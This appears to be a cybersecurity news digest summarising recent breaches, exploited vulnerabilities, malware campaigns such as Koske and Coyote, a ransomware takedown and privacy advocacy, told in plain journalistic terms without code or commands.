Daily Brief

Recent study by Harmonic Security reveals extensive unapproved use of Chinese GenAI tools among US and UK employees. Analysis of 14,000 employees showed 8% used China-based AI tools like DeepSeek and Baidu Chat, raising data security concerns. Over 17 megabytes of sensitive data, including source code and M&A documents, were uploaded to these platforms in one month. Data uploaded to these tools have doubtful data handling and privacy policies, potentially breaching compliance regulations. DeepSeek was the primary platform used, linked to 85% of the incidents where sensitive data was compromised. Harmonic Security’s monitoring tool offers real-time AI usage tracking and policy enforcement to mitigate risks. The study underscores a significant governance gap in companies with heavy developer presence where policy often lags behind tech adoption.

Qdos, a business insurance and employment status specialist, confirmed a data breach impacting customer personal data. The breach originated from unauthorized access to the mygoqdos.com web application. Detected on June 19, Qdos engaged third-party cybersecurity experts to investigate the breach. The breach did not involve ransomware, but personal customer information and documents related to insurance and IR35 services were potentially accessed. Financial data and sensitive identity documents like passports or driver's licenses were not compromised. Despite the data breach, Qdos assured clients that their insurance policies remain unaffected, and the functionality of online account management for policy renewals and applications is secure. Qdos has notified relevant authorities including the ICO, FCA, Action Fraud, and NCSC and is offering affected users free identity monitoring services through Experian.

DNSSEC (Domain Name System Security Extensions) has been implemented for systemsapproach.org but faced challenges with adoption and visibility compared to HTTPS. Despite its availability, DNSSEC's deployment is only around 34%, significantly lower than HTTPS which stands at 96% among top websites. DNSSEC lacks user-friendly indicators like the padlock for HTTPS, making its benefits less visible to end-users. Technological and adoption critiques, including suboptimal design choices, have led experts to doubt a significant increase in its deployment. DNSSEC ensures correctness of domain name to IP address translations, complementing HTTPS which secures server communication. Issues like DNS traffic modification for censorship highlight ongoing security concerns, underscoring the necessity of DNS security improvements. Advanced DNS technologies like DNS over HTTPS (DoH) and Oblivious DNS are being developed to enhance security but face their own challenges. The article suggests a need for continued DNS security efforts despite DNSSEC's shortcomings.

An Arizona woman, Christina Marie Chapman, was sentenced to 8.5 years in prison for facilitating a $17 million fraud involving North Korean IT workers posing as U.S. remote employees. Chapman operated a laptop farm from October 2020 to October 2023, aiding overseas IT personnel to acquire and execute U.S.-based employment fraudulently. Over 300 U.S. companies were deceived by this scam, including major corporations across various sectors such as technology, aerospace, and media. The scheme involved identity theft of 68 U.S. persons and fraudulent activities targeting two international firms alongside efforts to penetrate U.S. government agencies. Chapman was also ordered to forfeit over $284,000 destined for North Koreans and pay a $176,850 judgment. Post-sentence, she will undergo three years of supervised release. The U.S. Department of Justice highlighted the security risks posed by inadequate verification of remote workers, noting that such negligence aids foreign adversaries like North Korea. U.S. Attorney Jeanine Ferris Pirro emphasized the pivotal role companies play in defending against such threats, urging businesses to enhance employee verification processes.

The dark web leak sites of the BlackSuit ransomware operation, which breached numerous global organizations, were seized by law enforcement. The U.S. Department of Justice confirmed the involvement of multiple agencies, including Homeland Security, in Operation Checkmate, leading to the seizure. Seizure banners have replaced the content on the BlackSuit .onion domains, indicating the takedown by U.S. Homeland Security Investigations. International cooperation included agencies like the U.K. National Crime Agency, Europol, and the German State Criminal Police, among others. Romanian cybersecurity firm Bitdefender participated in the operation, although further details were not provided. Recent analysis by Cisco Talos suggests that BlackSuit, formerly known as Royal ransomware, may rebrand as Chaos ransomware. The Royal and BlackSuit ransomware variants have been involved in major criminal activities including demanding over $500 million in ransoms since their inception.

AMEOS Group, operating over 100 hospitals in Europe, suffered an IT system breach. Attackers potentially accessed patient and employee data, as well as other sensitive information. Following the breach, AMEOS shut down its network connections and systems as a precaution. Forensic experts have been hired to investigate the breach extent and whether data was stolen. Despite the network shutdown, AMEOS has alerted its 18,000 staff and approximately 500,000 patients and suppliers. AMEOS remains operational for emergency communications via telephone, though many calls were not answered. There is concern that exposed data could be used for scams or made accessible to unauthorized third parties. The attack may be linked to a recent vulnerability exploited in Microsoft SharePoint affecting numerous organizations.

Koske, a sophisticated new Linux malware, embeds payloads in JPEG images of pandas to deploy cryptocurrency miners. The malware may have been developed using artificial intelligence, specifically large language models or automation frameworks. It exploits misconfigurations in JupyterLab instances for initial access, then uses images hosted on legitimate services that function as both JPEGs and scripts. Utilizes a dual-payload strategy where one operates as a rootkit and the other as a script, both executed directly from memory for stealth and persistence. The script manages network settings and scans for working proxies to maintain a secure connection and traversal capabilities. Koske is designed to mine 18 different cryptocurrencies, automatically switching to a backup if necessary, showing high adaptability. AquaSec's research did not conclusively identify the threat actors behind Koske, despite traces pointing to Serbian and Slovak language usage in the malware's various components. AquaSec warns of the potential for more advanced, AI-driven malware variants capable of real-time adaptation, increasing future threat levels.

Threat actors exploited a critical vulnerability in Cisco's Identity Services Engine (ISE) since early July, prior to the patch release. The vulnerability, CVE-2025-20281, rated a perfect 10 on the CVSS scale, allowed unauthenticated remote code execution with root privileges. Cisco issued advisories for CVE-2025-20281 and other similarly critical flaws in late June and mid-July. Evidence of exploitation was first noted by the Shadowserver Foundation on around July 5th. Cisco acknowledged the active exploitation of these vulnerabilities in an update on July 21st, three weeks after initial reports by Shadowserver. Despite patches being made available, earlier fixes were insufficient, prompting Cisco to release more robust updates. Cisco advised customers with affected systems to update their software immediately due to the absence of alternative workarounds.

Researchers from the University of Waterloo have developed "UnMarker," a tool capable of removing watermarks from AI-generated images. UnMarker operates effectively offline using a 40 GB Nvidia A100 GPU and can erase watermarks in minutes. The tool challenges the reliability of watermarking as a defense against the misuse of AI-generated content such as deepfakes. Despite the heavy investments and support for watermarking technologies by major companies like Google and Meta, the UnMarker tool proved capable of bypassing various watermarking schemes. Testing showed that even the best watermark detection systems achieved a recognition rate of only about 43%, which is considered ineffective. The study questions the overall viability of digital watermarks in proving the origin of digital images, highlighting the need for more robust security measures. The research exposes vulnerabilities in both commercial and proposed digital watermarking systems, suggesting potential risks in relying on these technologies for detecting AI-manipulated media. This revelation comes despite significant endorsements and investments in watermark technology by industry giants and government bodies.

Mitel has issued security updates for a critical flaw in MiVoice MX-ONE that allows attackers to bypass authentication. The vulnerable component, Provisioning Manager, could enable unauthorized access to both user and admin accounts. The flaw, with a high CVSS score of 9.4, affects MiVoice MX-ONE versions ranging from 7.3 to 7.8 SP1. Patches are available for affected versions, and users are urged to apply these immediately to secure their systems. Customers are advised to keep MX-ONE services within trusted networks and limit public internet exposure as temporary mitigation. A separate high-severity vulnerability in MiCollab has also been patched, which involved an SQL injection risk potentially allowing information access and database manipulation. Mitel has emphasized the urgency of updating systems due to active exploitation of similar vulnerabilities in the past.

Fire Ant, a cyber espionage group with links to China-linked UNC3886, has been targeting virtualization technologies, specifically VMware ESXi and vCenter servers. The campaign involves sophisticated, multilayered attack techniques aimed at gaining and maintaining access to virtually segmented network environments. The attackers have demonstrated high persistence and adaptability, continuously modifying tactics and tools to circumvent eradication efforts and maintain control. Utilization of known vulnerabilities such as CVE-2023-34048 in VMware vCenter Server and CVE-2023-20867 in VMware Tools to manipulate network environments and extract critical credentials. Deployment of persistent backdoors and usage of Python-based malware providing remote command execution to keep access through reboot cycles. Direct interaction with guest VMs via stolen credentials and the manipulation of security measures to ensure stealth and uninterrupted access. Significant concern highlighted by Sygnia regarding the lack of visibility and effective detection methods at the hypervisor and infrastructure layers, where traditional security tools fall short.

Microsoft has officially recognized ransomware attacks by Storm-2603 on vulnerable SharePoint servers. Storm-2603, likely based in China but not conclusively tied to nation-state activity, has deployed Warlock ransomware using SharePoint vulnerabilities. The exploited bugs, CVE-2025-49704 and CVE-2025-49706, allow remote code execution and spoofing, respectively. After gaining access, Storm-2603 uses techniques to maintain persistence and steal user credentials, notably using tools like Mimikatz and PsExec. The attackers modify system configurations to disable Microsoft Defender and manipulate Group Policy Objects for ransomware deployment. Microsoft emphasizes the ongoing risk to unpatched SharePoint systems and advises immediate security update implementation. Over 400 organizations have been affected, with the US Energy Department also confirming an attack on its SharePoint systems.

EncryptHub compromised an early access game on Steam, injecting infostealer malware into the game files. The malware began with HijackLoader, establishing persistence on devices, followed by Vidar infostealer which was retrieved through a Telegram channel. A few hours after HijackLoader's insertion, Fickle Stealer was added via a DLL file, targeting data from web browsers including credentials and cryptocurrency wallet information. EncryptHub previously used Fickle Stealer in a campaign affecting over 600 organizations globally, displaying their recurring threat in cybercrime. The malware operates silently without affecting the game's performance, leaving users unaware of the background activities. The compromise utilized legitimate-looking executable files, exploiting Steam platform trust to bypass typical security suspicions. This incident highlights the need for caution when downloading early access or “work-in-progress” games on Steam due to potentially lax review procedures. No official response from the game’s developers or Steam, though the game remains available for download; users are advised to avoid downloading until clarifications are made.

Coyote, a banking trojan, is utilizing Microsoft's UI Automation to steal credentials from Brazilian users, targeting 75 banking and cryptocurrency sites. This variant of Coyote malware was first identified in the wild in February 2024 and has evolved to exploit UI Automation, marking a novel method in cyberattacks. UI Automation, primarily an accessibility aid, is being manipulated to intercept and extract user data from financial applications. The malware operates by first collecting victim details and their financial services usage patterns, then employing UI Automation to identify and extract credentials. Akamai's report highlights this method's capability to bypass traditional antivirus and endpoint security through the clever use of legitimate software frameworks. Coyote malware also features techniques like keylogging and phishing overlays, enhancing its stealth and efficacy against defenses. The ongoing evolution and sophistication of Coyote underscore the persistent and adaptive nature of cyber threats in targeting financial institutions.

The Electronic Frontier Foundation (EFF) remains committed to battling for online community rights and addressing upcoming threats such as data accumulation by Palantir and widespread data harvesting. Cindy Cohn, EFF's executive director since 2000, highlights the organization's pivotal role in defending online privacy and freedom against governmental overreach and private data brokers. The EFF has historically been involved in significant cases, including supporting Dan Bernstein in the '90s against U.S export restrictions on cryptography, and exposing AT&T’s collaboration with government surveillance in 2006. Current concerns include potential misuse of massive databases by Palantir that may facilitate government surveillance without warrants, and the U.S Supreme Court's decisions impacting personal privacy. Despite political shifts and varying support from administrations, EFF continues advocating for encryption to protect individual privacy against unauthorized surveillance. Whistleblowers play a crucial role in revealing illegal activities, supported by EFF’s legal assistance and technological tools like Privacy Badger and the Atlas of Surveillance. With ongoing support from tech luminaries and a focus on its core principles of free speech, privacy, and innovation, EFF aims to influence more comprehensive legal protections and public awareness.